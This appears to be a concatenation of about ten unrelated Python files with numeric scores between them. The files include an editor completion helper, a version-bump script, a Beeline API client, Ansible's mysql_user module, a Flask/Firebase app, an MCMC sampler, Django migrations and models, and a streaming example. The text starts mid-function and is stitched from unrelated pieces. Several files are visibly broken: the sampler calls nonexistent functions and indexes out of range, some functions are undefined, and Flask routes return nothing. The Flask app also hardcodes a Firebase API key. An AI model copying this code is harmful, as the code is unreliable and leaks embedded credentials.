new_candidate[ 'abbr' ] = new_candidate[ 'word' ]
new_candidate[ 'word' ] = NewCandidateInsertionText(
new_candidate[ 'word' ],
text_after_cursor )
new_candidates.append( new_candidate )
elif isinstance( candidate, str ) or isinstance( candidate, bytes ):
new_candidates.append(
{ 'abbr': candidate,
'word': NewCandidateInsertionText( candidate, text_after_cursor ) } )
return new_candidates
def OverlapLength( left_string, right_string ):
"""Returns the length of the overlap between two strings.
Example: "foo baro" and "baro zoo" -> 4
"""
left_string_length = len( left_string )
right_string_length = len( right_string )
if not left_string_length or not right_string_length:
return 0
# Truncate the longer string.
if left_string_length > right_string_length:
left_string = left_string[ -right_string_length: ]
elif left_string_length < right_string_length:
right_string = right_string[ :left_string_length ]
if left_string == right_string:
return min( left_string_length, right_string_length )
# Start by looking for a single character match
# and increase length until no match is found.
best = 0
length = 1
while True:
pattern = left_string[ -length: ]
found = right_string.find( pattern )
if found < 0:
return best
length += found
if left_string[ -length: ] == right_string[ :length ]:
best = length
length += 1
| 0.025299 |
#!/usr/bin/env python
# Copyright (c) 2013 Intel Corporation. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
increment-version.py -- Bump Beta or Canary version number across all required
files.
Crosswalk's versioning schema is "MAJOR.MINOR.BUILD.PATCH". Incrementing a beta
version will monotonically increase the PATCH number, while incrementing a
canary version will monotonically increase the BUILD number.
"""
import optparse
import os
import re
import sys
def PathFromRoot(path):
"""
Returns the absolute path to |path|, which is supposed to be relative to the
repository's root directory.
"""
return os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', path)
def IncrementVersions(replacements):
"""
|replacements| is a dictionary whose keys are files (relative to the root of
the repository) and values are regular expresions that match a section in the
file with the version number we want to increase.
The regular expression is expected to have 2 groups, the first matching
whatever precedes the version number and needs to stay the same, and the
second matching the number itself.
Each of the files specified will be overwritten with new version numbers.
"""
for path, regexp in replacements.iteritems():
# The paths are always relative to the repository's root directory.
path = PathFromRoot(path)
def _ReplacementFunction(match_obj):
version_number = int(match_obj.group(2))
return '%s%s' % (match_obj.group(1), version_number + 1)
contents = re.sub(regexp, _ReplacementFunction, open(path).read())
open(path, 'w').write(contents)
def Main():
option_parser = optparse.OptionParser()
option_parser.add_option(
'', '--type', choices=('beta', 'canary'), dest='release_type',
help='What part of the version number must be increased. \"beta\" '
'increases the patch version, \"canary\" increases the build '
'version.')
options, _ = option_parser.parse_args()
if options.release_type == 'beta':
replacements = {
'VERSION': r'(PATCH=)(\d+)',
'packaging/crosswalk.spec': r'(Version:\s+\d+\.\d+\.\d+\.)(\d+)',
}
IncrementVersions(replacements)
elif options.release_type == 'canary':
replacements = {
'VERSION': r'(BUILD=)(\d+)',
'packaging/crosswalk.spec': r'(Version:\s+\d+\.\d+\.)(\d+)',
}
IncrementVersions(replacements)
else:
print '--type is a required argument and has not been specified. Exiting.'
return 1
return 0
if __name__ == '__main__':
sys.exit(Main())
| 0.005303 |
import requests
LOGIN = ''
PASSWORD = ''
is_stub = True
def get_beeline_token():
"""
По логину и паролю по api beeline получаем токен билайна
пример токена 51BF96B928C8C71124BE61C1BF787B23
"""
url = '=%s' % (LOGIN, PASSWORD)
res = requests.get(url)
try:
res = res.json()
if res['meta']['code'] == 20000:
beeline_token = res['token']
return beeline_token, ""
else:
return None, res['meta']['message']
except Exception:
return None, "Error_%s" % res.status_code
def get_subscriptions(ctn):
bt, _ = get_beeline_token()
if is_stub:
url = 'http://127.0.0.1:5050/get'
else:
url = '=%s' % ctn
cookies = {'token': bt}
response = requests.get(url, cookies=cookies)
try:
response = response.json()
if response.get('meta').get('code') == 20000:
subscribes_list = response.get('subscriptions')
if len(subscribes_list) == 0:
result = "Подписок нет"
return result, None
else:
result = subscribes_list
return result, None
else:
result = response.get('meta').get('message')
return None, result
except Exception:
return None, "Error_%s" % response.status_code
# https://my.beeline.ru/api/1.0/info/serviceAvailableList?ctn=9060447044
def get_available_subscriptions(): pass
def remove_subscriptions(ctn, subscription_id):
bt, _ = get_beeline_token()
if is_stub:
url = 'http://127.0.0.1:5050/remove?subscriptionId=%s' % subscription_id
else:
url = '={}&subscriptionId={}'.format(ctn, subscription_id)
cookies = {'token': bt}
response = requests.get(url, cookies=cookies)
response = response.json()
if response.get('meta').get('code') == 20000:
result = 'Скоро отключим, обновите страницу'
else:
result = response.get('meta').get('message')
return result
if __name__ == '__main__':
login = ''
password = ''
ctn = ''
token = get_token(login, password)
user_info = get_personal_info(token, login, ctn)
print(user_info)
| 0.000905 |
#!/usr/bin/python
# (c) 2012, Mark Theunissen <[email protected]>
# Sponsored by Four Kitchens http://fourkitchens.com.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: mysql_user
short_description: Adds or removes a user from a MySQL database.
description:
- Adds or removes a user from a MySQL database.
version_added: "0.6"
options:
name:
description:
- name of the user (role) to add or remove
required: true
password:
description:
- set the user's password. (Required when adding a user)
required: false
default: null
host:
description:
- the 'host' part of the MySQL username
required: false
default: localhost
login_user:
description:
- The username used to authenticate with
required: false
default: null
login_password:
description:
- The password used to authenticate with
required: false
default: null
login_host:
description:
- Host running the database
required: false
default: localhost
login_port:
description:
- Port of the MySQL server
required: false
default: 3306
version_added: '1.4'
login_unix_socket:
description:
- The path to a Unix domain socket for local connections
required: false
default: null
priv:
description:
- "MySQL privileges string in the format: C(db.table:priv1,priv2)"
required: false
default: null
append_privs:
description:
- Append the privileges defined by priv to the existing ones for this
user instead of overwriting existing ones.
required: false
choices: [ "yes", "no" ]
default: "no"
version_added: "1.4"
state:
description:
- Whether the user should exist. When C(absent), removes
the user.
required: false
default: present
choices: [ "present", "absent" ]
check_implicit_admin:
description:
- Check if mysql allows login as root/nopassword before trying supplied credentials.
required: false
choices: [ "yes", "no" ]
default: "no"
version_added: "1.3"
update_password:
required: false
default: always
choices: ['always', 'on_create']
version_added: "2.0"
description:
- C(always) will update passwords if they differ. C(on_create) will only set the password for newly created users.
config_file:
description:
- Specify a config file from which user and password are to be read
required: false
default: '~/.my.cnf'
version_added: "2.0"
notes:
- Requires the MySQLdb Python package on the remote host. For Ubuntu, this
is as easy as apt-get install python-mysqldb.
- Both C(login_password) and C(login_user) are required when you are
passing credentials. If none are present, the module will attempt to read
the credentials from C(~/.my.cnf), and finally fall back to using the MySQL
default login of 'root' with no password.
- "MySQL server installs with default login_user of 'root' and no password. To secure this user
as part of an idempotent playbook, you must create at least two tasks: the first must change the root user's password,
without providing any login_user/login_password details. The second must drop a ~/.my.cnf file containing
the new root credentials. Subsequent runs of the playbook will then succeed by reading the new credentials from
the file."
requirements: [ "MySQLdb" ]
author: "Mark Theunissen (@marktheunissen)"
'''
EXAMPLES = """
# Create database user with name 'bob' and password '12345' with all database privileges
- mysql_user: name=bob password=12345 priv=*.*:ALL state=present
# Creates database user 'bob' and password '12345' with all database privileges and 'WITH GRANT OPTION'
- mysql_user: name=bob password=12345 priv=*.*:ALL,GRANT state=present
# Modify user Bob to require SSL connections. Note that REQUIRESSL is a special privilege that should only apply to *.* by itself.
- mysql_user: name=bob append_privs=true priv=*.*:REQUIRESSL state=present
# Ensure no user named 'sally' exists, also passing in the auth credentials.
- mysql_user: login_user=root login_password=123456 name=sally state=absent
# Specify grants composed of more than one word
- mysql_user: name=replication password=12345 priv=*.*:"REPLICATION CLIENT" state=present
# Revoke all privileges for user 'bob' and password '12345'
- mysql_user: name=bob password=12345 priv=*.*:USAGE state=present
# Example privileges string format
mydb.*:INSERT,UPDATE/anotherdb.*:SELECT/yetanotherdb.*:ALL
# Example using login_unix_socket to connect to server
- mysql_user: name=root password=abc123 login_unix_socket=/var/run/mysqld/mysqld.sock
# Example .my.cnf file for setting the root password
[client]
user=root
password=n<_665{vS43y
"""
import getpass
import tempfile
import re
try:
import MySQLdb
except ImportError:
mysqldb_found = False
else:
mysqldb_found = True
VALID_PRIVS = frozenset(('CREATE', 'DROP', 'GRANT', 'GRANT OPTION',
'LOCK TABLES', 'REFERENCES', 'EVENT', 'ALTER',
'DELETE', 'INDEX', 'INSERT', 'SELECT', 'UPDATE',
'CREATE TEMPORARY TABLES', 'TRIGGER', 'CREATE VIEW',
'SHOW VIEW', 'ALTER ROUTINE', 'CREATE ROUTINE',
'EXECUTE', 'FILE', 'CREATE TABLESPACE', 'CREATE USER',
'PROCESS', 'PROXY', 'RELOAD', 'REPLICATION CLIENT',
'REPLICATION SLAVE', 'SHOW DATABASES', 'SHUTDOWN',
'SUPER', 'ALL', 'ALL PRIVILEGES', 'USAGE', 'REQUIRESSL'))
class InvalidPrivsError(Exception):
pass
# ===========================================
# MySQL module specific support methods.
#
def connect(module, login_user=None, login_password=None, config_file=''):
config = {
'host': module.params['login_host'],
'db': 'mysql'
}
if module.params['login_unix_socket']:
config['unix_socket'] = module.params['login_unix_socket']
else:
config['port'] = module.params['login_port']
if os.path.exists(config_file):
config['read_default_file'] = config_file
# If login_user or login_password are given, they should override the
# config file
if login_user is not None:
config['user'] = login_user
if login_password is not None:
config['passwd'] = login_password
db_connection = MySQLdb.connect(**config)
return db_connection.cursor()
def user_exists(cursor, user, host):
cursor.execute("SELECT count(*) FROM user WHERE user = %s AND host = %s", (user,host))
count = cursor.fetchone()
return count[0] > 0
def user_add(cursor, user, host, password, new_priv):
cursor.execute("CREATE USER %s@%s IDENTIFIED BY %s", (user,host,password))
if new_priv is not None:
for db_table, priv in new_priv.iteritems():
privileges_grant(cursor, user,host,db_table,priv)
return True
def user_mod(cursor, user, host, password, new_priv, append_privs):
changed = False
grant_option = False
# Handle passwords
if password is not None:
cursor.execute("SELECT password FROM user WHERE user = %s AND host = %s", (user,host))
current_pass_hash = cursor.fetchone()
cursor.execute("SELECT PASSWORD(%s)", (password,))
new_pass_hash = cursor.fetchone()
if current_pass_hash[0] != new_pass_hash[0]:
cursor.execute("SET PASSWORD FOR %s@%s = PASSWORD(%s)", (user,host,password))
changed = True
# Handle privileges
if new_priv is not None:
curr_priv = privileges_get(cursor, user,host)
# If the user has privileges on a db.table that doesn't appear at all in
# the new specification, then revoke all privileges on it.
for db_table, priv in curr_priv.iteritems():
# If the user has the GRANT OPTION on a db.table, revoke it first.
if "GRANT" in priv:
grant_option = True
if db_table not in new_priv:
if user != "root" and "PROXY" not in priv and not append_privs:
privileges_revoke(cursor, user,host,db_table,priv,grant_option)
changed = True
# If the user doesn't currently have any privileges on a db.table, then
# we can perform a straight grant operation.
for db_table, priv in new_priv.iteritems():
if db_table not in curr_priv:
privileges_grant(cursor, user,host,db_table,priv)
changed = True
# If the db.table specification exists in both the user's current privileges
# and in the new privileges, then we need to see if there's a difference.
db_table_intersect = set(new_priv.keys()) & set(curr_priv.keys())
for db_table in db_table_intersect:
priv_diff = set(new_priv[db_table]) ^ set(curr_priv[db_table])
if (len(priv_diff) > 0):
if not append_privs:
privileges_revoke(cursor, user,host,db_table,curr_priv[db_table],grant_option)
privileges_grant(cursor, user,host,db_table,new_priv[db_table])
changed = True
return changed
def user_delete(cursor, user, host):
cursor.execute("DROP USER %s@%s", (user, host))
return True
def privileges_get(cursor, user,host):
""" MySQL doesn't have a better method of getting privileges aside from the
SHOW GRANTS query syntax, which requires us to then parse the returned string.
Here's an example of the string that is returned from MySQL:
GRANT USAGE ON *.* TO 'user'@'localhost' IDENTIFIED BY 'pass';
This function makes the query and returns a dictionary containing the results.
The dictionary format is the same as that returned by privileges_unpack() below.
"""
output = {}
cursor.execute("SHOW GRANTS FOR %s@%s", (user, host))
grants = cursor.fetchall()
def pick(x):
if x == 'ALL PRIVILEGES':
return 'ALL'
else:
return x
for grant in grants:
res = re.match("GRANT (.+) ON (.+) TO '.*'@'.+'( IDENTIFIED BY PASSWORD '.+')? ?(.*)", grant[0])
if res is None:
raise InvalidPrivsError('unable to parse the MySQL grant string: %s' % grant[0])
privileges = res.group(1).split(", ")
privileges = [ pick(x) for x in privileges]
if "WITH GRANT OPTION" in res.group(4):
privileges.append('GRANT')
if "REQUIRE SSL" in res.group(4):
privileges.append('REQUIRESSL')
db = res.group(2)
output[db] = privileges
return output
def privileges_unpack(priv):
""" Take a privileges string, typically passed as a parameter, and unserialize
it into a dictionary, the same format as privileges_get() above. We have this
custom format to avoid using YAML/JSON strings inside YAML playbooks. Example
of a privileges string:
mydb.*:INSERT,UPDATE/anotherdb.*:SELECT/yetanother.*:ALL
The privilege USAGE stands for no privileges, so we add that in on *.* if it's
not specified in the string, as MySQL will always provide this by default.
"""
output = {}
privs = []
for item in priv.strip().split('/'):
pieces = item.strip().split(':')
dbpriv = pieces[0].rsplit(".", 1)
# Do not escape if privilege is for database '*' (all databases)
if dbpriv[0].strip('`') != '*':
pieces[0] = "`%s`.%s" % (dbpriv[0].strip('`'), dbpriv[1])
if '(' in pieces[1]:
output[pieces[0]] = re.split(r',\s*(?=[^)]*(?:\(|$))', pieces[1].upper())
for i in output[pieces[0]]:
privs.append(re.sub(r'\(.*\)','',i))
else:
output[pieces[0]] = pieces[1].upper().split(',')
privs = output[pieces[0]]
new_privs = frozenset(privs)
if not new_privs.issubset(VALID_PRIVS):
raise InvalidPrivsError('Invalid privileges specified: %s' % new_privs.difference(VALID_PRIVS))
if '*.*' not in output:
output['*.*'] = ['USAGE']
# if we are only specifying something like REQUIRESSL in *.* we still need
# to add USAGE as a privilege to avoid syntax errors
if priv.find('REQUIRESSL') != -1 and 'USAGE' not in output['*.*']:
output['*.*'].append('USAGE')
return output
def privileges_revoke(cursor, user,host,db_table,priv,grant_option):
# Escape '%' since mysql db.execute() uses a format string
db_table = db_table.replace('%', '%%')
if grant_option:
query = ["REVOKE GRANT OPTION ON %s" % mysql_quote_identifier(db_table, 'table')]
query.append("FROM %s@%s")
query = ' '.join(query)
cursor.execute(query, (user, host))
priv_string = ",".join([p for p in priv if p not in ('GRANT', 'REQUIRESSL')])
query = ["REVOKE %s ON %s" % (priv_string, mysql_quote_identifier(db_table, 'table'))]
query.append("FROM %s@%s")
query = ' '.join(query)
cursor.execute(query, (user, host))
def privileges_grant(cursor, user,host,db_table,priv):
# Escape '%' since mysql db.execute uses a format string and the
# specification of db and table often use a % (SQL wildcard)
db_table = db_table.replace('%', '%%')
priv_string = ",".join([p for p in priv if p not in ('GRANT', 'REQUIRESSL')])
query = ["GRANT %s ON %s" % (priv_string, mysql_quote_identifier(db_table, 'table'))]
query.append("TO %s@%s")
if 'GRANT' in priv:
query.append("WITH GRANT OPTION")
if 'REQUIRESSL' in priv:
query.append("REQUIRE SSL")
query = ' '.join(query)
cursor.execute(query, (user, host))
# ===========================================
# Module execution.
#
def main():
module = AnsibleModule(
argument_spec = dict(
login_user=dict(default=None),
login_password=dict(default=None),
login_host=dict(default="localhost"),
login_port=dict(default=3306, type='int'),
login_unix_socket=dict(default=None),
user=dict(required=True, aliases=['name']),
password=dict(default=None, no_log=True),
host=dict(default="localhost"),
state=dict(default="present", choices=["absent", "present"]),
priv=dict(default=None),
append_privs=dict(default=False, type='bool'),
check_implicit_admin=dict(default=False, type='bool'),
update_password=dict(default="always", choices=["always", "on_create"]),
config_file=dict(default="~/.my.cnf"),
)
)
login_user = module.params["login_user"]
login_password = module.params["login_password"]
user = module.params["user"]
password = module.params["password"]
host = module.params["host"].lower()
state = module.params["state"]
priv = module.params["priv"]
check_implicit_admin = module.params['check_implicit_admin']
config_file = module.params['config_file']
append_privs = module.boolean(module.params["append_privs"])
update_password = module.params['update_password']
config_file = os.path.expanduser(os.path.expandvars(config_file))
if not mysqldb_found:
module.fail_json(msg="the python mysqldb module is required")
if priv is not None:
try:
priv = privileges_unpack(priv)
except Exception, e:
module.fail_json(msg="invalid privileges string: %s" % str(e))
cursor = None
try:
if check_implicit_admin:
try:
cursor = connect(module, 'root', '', config_file)
except:
pass
if not cursor:
cursor = connect(module, login_user, login_password, config_file)
except Exception, e:
module.fail_json(msg="unable to connect to database, check login_user and login_password are correct or ~/.my.cnf has the credentials. Exception message: %s" % e)
if state == "present":
if user_exists(cursor, user, host):
try:
if update_password == 'always':
changed = user_mod(cursor, user, host, password, priv, append_privs)
else:
changed = user_mod(cursor, user, host, None, priv, append_privs)
except (SQLParseError, InvalidPrivsError, MySQLdb.Error), e:
module.fail_json(msg=str(e))
else:
if password is None:
module.fail_json(msg="password parameter required when adding a user")
try:
changed = user_add(cursor, user, host, password, priv)
except (SQLParseError, InvalidPrivsError, MySQLdb.Error), e:
module.fail_json(msg=str(e))
elif state == "absent":
if user_exists(cursor, user, host):
changed = user_delete(cursor, user, host)
else:
changed = False
module.exit_json(changed=changed, user=user)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.database import *
if __name__ == '__main__':
main()
| 0.005514 |
from flask import Flask
from flask import request
from flask import jsonify
import pyrebase
app = Flask(__name__)
config = {
"apiKey": "AIzaSyBXZpwPptJjUJddDl6Q0DpG_3k7mGDdHk8",
"authDomain": "my-first-project-fea9c.firebaseapp.com",
"databaseURL": "https://my-first-project-fea9c.firebaseio.com/",
"storageBucket": "my-first-project-fea9c.appspot.com"
}
firebase = pyrebase.initialize_app(config)
@app.route('/')
def hello_world():
return 'Hello, World!'
@app.route('/createuser')
def create_user():
username = request.headers.get('email')
password = request.headers.get('password')
auth = firebase.auth()
auth.create_user_with_email_and_password(username, password)
@app.route('/login')
def login():
username = request.headers.get('email')
password = request.headers.get('password')
auth = firebase.auth()
auth.sign_in_with_email_and_password(username, password)
@app.route('/createlist')
def create_list():
owner = request.headers.get('owner')
list_name = request.headers.get('name')
db = firebase.database()
list_data = {
'owner': owner,
'name': list_name
}
resp = db.child("lists").push(list_data)
return resp["name"]
@app.route('/list')
def get_list():
list_id = request.headers.get('listID')
db = firebase.database()
data = db.child('lists').child(list_id).get()
return jsonify(data.val()) | 0.004246 |
import numpy as np
def sample_distparams(F,dist_struct,hyperparams,hyperhyperparams,num_iters):
#function [hyperparams] = sample_distparams(F,dist_struct,hyperparams,hyperhyperparams,num_iters)
numObj = len(dist_struct)
Ki = np.zeros((1,numObj))
sum_log_pi_kk = np.zeros((1,numObj))
sum_log_pi_all = np.zeros((1,numObj))
for ii in range(len(dist_struct)):
Ki[ii] = np.sum(F[ii,:])
pi_z_ii = dist_struct[ii].pi_z(F[ii,:],F[ii,:])
pi_z_ii = pi_z_ii/np.tile(np.sum(pi_z_ii,axis=1),(1,pi_z_ii.shape[1]))
sum_log_pi_kk[ii] = np.sum(np.log(np.linalg.diag(pi_z_ii)))
sum_log_pi_all[ii] = np.sum(np.log(pi_z_ii))
# Hyperparameters for prior on kappa:
a_kappa = hyperhyperparams.a_kappa
b_kappa = hyperhyperparams.b_kappa
# Variance of gamma proposal:
var_kappa = hyperhyperparams.var_kappa
# Hyperparameters for prior on alpha:
a_alpha = hyperhyperparams.a_alpha
b_alpha = hyperhyperparams.b_alpha
# Variance of gamma proposal:
var_alpha = hyperhyperparams.var_alpha
# Last value of alpha and kappa:
alpha0 = hyperparams.alpha0
kappa0 = hyperparams.kappa0
for nn in range(num_iters):
####### Sample kappa given alpha #######
# (a,b) hyperparameters of gamma prior based on fixed variance and setting
# mean equal to previous kappa value:
aa_kappa0 = (kappa0**2)/var_kappa
bb_kappa0 = kappa0/var_kappa
# Sample a proposed kappa:
kappa = randgamma(aa_kappa0) / bb_kappa0
# Determine log-likelihood of transition distributions given previous kappa
# value and proposed kappa value:
log_diff_f = 0
for ii in range(len(dist_struct)):
log_diff_f = log_diff_f + Ki[ii]*(gammaln(alpha0*Ki[ii]+kappa)-gammaln(alpha0*Ki[ii]+kappa0)) \
- Ki[ii]*(gammaln(alpha0+kappa)-gammaln(alpha0+kappa0)) + (kappa-kappa0)*sum_log_pi_kk[ii]
# Add in prior probability of previous and proposed kappa values:
log_diff_f = log_diff_f + (a_kappa-1)*(np.log(kappa)-np.log(kappa0))-(kappa-kappa0)*b_kappa
# (a,b) hyperparameters of gamma prior based on fixed variance and setting
# mean equal to proposed kappa value:
aa_kappa = (kappa**2)/var_kappa
bb_kappa = kappa/var_kappa
# Log accept-reject ratio:
log_rho = log_diff_f + (gammaln(aa_kappa0) - gammaln(aa_kappa)) \
+ (aa_kappa-aa_kappa0-1)*np.log(kappa0) - (aa_kappa0-aa_kappa-1)*np.log(kappa) \
+ (aa_kappa0-aa_kappa)*np.log(var_kappa)
if isinf(log_rho):
log_rho = -np.inf
rho = np.exp(log_rho)
if rho > 1:
kappa0 = kappa
else:
sample_set = [kappa0, kappa]
ind = 1 + (np.random.rand() > (1-rho) )
kappa0 = sample_set[ind]
####### Sample alpha given kappa #######
# (a,b) hyperparameters of gamma prior based on fixed variance and setting
# mean equal to previous alpha value:
aa_alpha0 = (alpha0**2)/var_alpha
bb_alpha0 = alpha0/var_alpha
# Sample a proposed alpha:
alpha = randgamma(aa_alpha0) / bb_alpha0
# Determine log-likelihood of transition distributions given previous alpha
# value and proposed alpha value:
log_diff_f = 0
for ii in range(len(dist_struct)):
log_diff_f = log_diff_f + Ki[ii]*(gammaln(alpha*Ki[ii]+kappa0)-gammaln(alpha0*Ki[ii]+kappa0)) \
- Ki[ii]*(gammaln(alpha+kappa0)-gammaln(alpha0+kappa0)) \
- Ki[ii]*(Ki[ii]-1)*(gammaln(alpha)-gammaln(alpha0)) \
+ (alpha-alpha0)*sum_log_pi_all[ii]
# Add in prior probability of previous and proposed alpha values:
log_diff_f = log_diff_f + (a_alpha-1)*(np.log(alpha)-np.log(alpha0))-(alpha-alpha0)*b_alpha
# (a,b) hyperparameters of gamma prior based on fixed variance and setting
# mean equal to proposed kappa value:
aa_alpha = (alpha**2)/var_alpha
bb_alpha = alpha/var_alpha
# Log accept-reject ratio:
log_rho = log_diff_f + (gammaln(aa_alpha0) - gammaln(aa_alpha)) \
+ (aa_alpha-aa_alpha0-1)*np.log(alpha0) - (aa_alpha0-aa_alpha-1)*np.log(alpha) \
+ (aa_alpha0-aa_alpha)*np.log(var_alpha)
if np.isinf(log_rho):
log_rho = np.inf
rho = np.exp(log_rho)
if rho > 1:
alpha0 = alpha
else:
sample_set = [alpha0, alpha]
ind = 1+(np.random.rand() > (1-rho) )
alpha0 = sample_set[ind]
# Write final values:
hyperparams.alpha0 = alpha0
hyperparams.kappa0 = kappa0
return hyperparams
| 0.015055 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('taxbrain', '0013_auto_20141021_1346'),
]
operations = [
migrations.CreateModel(
name='AdjustmentsInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='AlternativeMinimumInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='CreditsInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='GrossIncomeInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='IncomeRatesInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ItemizedDeductionsInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='SocialSecurityInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='StandardDeductionsInputs',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.RenameModel(
old_name='TaxSaveInputs',
new_name='PersonalExemptionsInputs',
),
]
| 0.002825 |
from __future__ import print_function
import time
import random
import ztreamy
import tornado.ioloop
# Create a server with two streams
server = ztreamy.StreamServer(9000)
# Create the streams; stream1 allows remote producers to publish through HTTP
stream1 = ztreamy.Stream('/stream1', allow_publish=True)
stream2 = ztreamy.Stream('/stream2')
server.add_stream(stream1)
server.add_stream(stream2)
# Create two publisher objects
publisher1 = ztreamy.LocalEventPublisher(stream1)
publisher2 = ztreamy.LocalEventPublisher(stream2)
source_id = ztreamy.random_id()
application_ids = ['ztreamy-example-a', 'ztreamy-example-b']
# Publish events periodically
def publish_hi():
print('Publishing "hi"')
app_id = random.choice(application_ids)
event = ztreamy.Event(source_id, 'text/plain', 'Hi', application_id=app_id)
publisher1.publish(event)
def publish_there():
print('Publishing "there"')
app_id = random.choice(application_ids)
event = ztreamy.Event(source_id, 'text/plain', 'there!',
application_id=app_id)
publisher2.publish(event)
tornado.ioloop.PeriodicCallback(publish_hi, 10000).start()
time.sleep(5)
tornado.ioloop.PeriodicCallback(publish_there, 10000).start()
try:
print('Starting the server')
server.start(loop=True)
except KeyboardInterrupt:
# Allow ctrl-c to close the server
pass
finally:
server.stop()
| 0.002141 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from autoslug import AutoSlugField
from django.db import models
from django.db.models import F
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from django.conf import settings
from django.utils import timezone
from .config import COMMENT_ACTION, COMMENT
class Category(models.Model):
"""
Category model
"""
parent = models.ForeignKey('self', verbose_name=_("category parent"), blank=True, null=True)
title = models.CharField(_("title"), max_length=75)
slug = AutoSlugField(populate_from="title", blank=True, unique=True)
description = models.CharField(_("description"), max_length=255, blank=True)
color = models.CharField(_("color"), max_length=7, blank=True,
help_text=_("Title color in hex format (i.e: #1aafd0)."))
is_global = models.BooleanField(_("global"), default=True,
help_text=_('Designates whether the topics will be'
'displayed in the all-categories list.'))
is_closed = models.BooleanField(_("closed"), default=False)
is_removed = models.BooleanField(_("removed"), default=False)
is_private = models.BooleanField(_("private"), default=False)
class Meta:
ordering = ['-pk']
verbose_name = _("category")
verbose_name_plural = _("categories")
def __unicode__(self):
return self.title.encode('utf-8')
def get_absolute_url(self):
return reverse(
'drf_spirit:category-detail',
kwargs={'pk': str(self.id), 'slug': self.slug})
@property
def is_subcategory(self):
if self.parent_id:
return True
else:
return False
class Topic(models.Model):
"""
Topic model
"""
user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='spirit_topics', editable=False)
category = models.ForeignKey(Category, verbose_name=_("category"))
title = models.CharField(_("title"), max_length=255)
description = models.TextField(_("description"), default=_("No descriptions"), blank=True)
slug = AutoSlugField(populate_from="title", blank=True, unique=True)
date = models.DateTimeField(_("date"), default=timezone.now, blank=True, editable=False)
last_active = models.DateTimeField(_("last active"), default=timezone.now, blank=True, editable=False)
is_pinned = models.BooleanField(_("pinned"), default=False)
is_globally_pinned = models.BooleanField(_("globally pinned"), default=False, editable=False)
is_closed = models.BooleanField(_("closed"), default=False)
is_removed = models.BooleanField(default=False)
is_archived = models.BooleanField(default=False)
view_count = models.PositiveIntegerField(_("views count"), default=0, editable=False)
comment_count = models.PositiveIntegerField(_("comment count"), default=0, editable=False)
class Meta:
ordering = ['-last_active', '-pk']
verbose_name = _("topic")
verbose_name_plural = _("topics")
def __unicode__(self):
return self.title.encode('utf-8')
def get_absolute_url(self):
return reverse('drf_spirit:topic-detail', kwargs={'pk': str(self.id), 'slug': self.slug})
@property
def main_category(self):
return self.category.parent or self.category
def increase_view_count(self):
Topic.objects.filter(pk=self.pk).update(view_count=F('view_count') + 1)
def increase_comment_count(self):
Topic.objects.filter(pk=self.pk).update(comment_count=F('comment_count') + 1, last_active=timezone.now())
def decrease_comment_count(self):
# todo: update last_active to last() comment
Topic.objects.filter(pk=self.pk).update(comment_count=F('comment_count') - 1)
class Comment(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='forum_comments', editable=False)
topic = models.ForeignKey(Topic, related_name='comments')
comment = models.TextField(_("comment"))
action = models.IntegerField(_("action"), choices=COMMENT_ACTION, default=COMMENT)
date = models.DateTimeField(default=timezone.now, blank=True, editable=False)
is_removed = models.BooleanField(default=False)
is_modified = models.BooleanField(default=False, editable=False)
ip_address = models.GenericIPAddressField(blank=True, null=True, editable=False)
modified_count = models.PositiveIntegerField(_("modified count"), default=0, editable=False)
likes_count = models.PositiveIntegerField(_("likes count"), default=0, editable=False)
class Meta:
ordering = ['-date', '-pk']
verbose_name = _("comment")
verbose_name_plural = _("comments")
def __unicode__(self):
return self.comment[:10].encode('utf-8')
def increase_modified_count(self):
Comment.objects.filter(pk=self.pk).update(modified_count=F('modified_count') + 1)
def increase_likes_count(self):
Comment.objects.filter(pk=self.pk).update(likes_count=F('likes_count') + 1)
def decrease_likes_count(self):
(Comment.objects.filter(pk=self.pk, likes_count__gt=0)
.update(likes_count=F('likes_count') - 1))
def save(self, *args, **kwargs):
# Comment has pk, means the comment is modified. So increase modified_count and change is_modified
if self.pk:
self.is_modified = True
self.modified_count = F('modified_count') + 1
super(Comment, self).save(*args, **kwargs)
if self.pk:
# comment has pk means modified_count is changed.
# As we use F expression, its not possible to know modified_count until refresh from db
self.refresh_from_db()
| 0.004265 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
